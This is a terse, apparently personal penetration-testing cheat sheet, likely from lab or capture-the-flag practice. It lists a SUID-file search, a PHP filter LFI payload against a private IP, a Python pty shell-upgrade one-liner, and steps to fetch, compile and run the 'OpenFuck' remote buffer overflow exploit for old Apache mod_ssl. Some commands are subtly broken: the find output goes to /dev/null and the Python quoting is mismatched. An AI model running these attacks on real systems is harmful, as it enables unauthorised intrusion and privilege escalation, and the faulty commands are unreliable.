find su permetion
find / -perm -u=s -type f >/dev/null
=================================
LFI
http://192.168.1.10/?lang=php://filter/convert.base64-encode/resource=index
====================================================
python-c  "import pty;pty.spawn("/bin/sh")

==============================================

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow
0-download 764.c from  ====>  https://github.com/haco1971/codes/blob/master/764.c
1=apt-get install libssl-dev
2-apt-get install libssl1.0-dev
3-gcc -o OpenFuck 764.c -lcrypto
4-./OpenFuck
5-
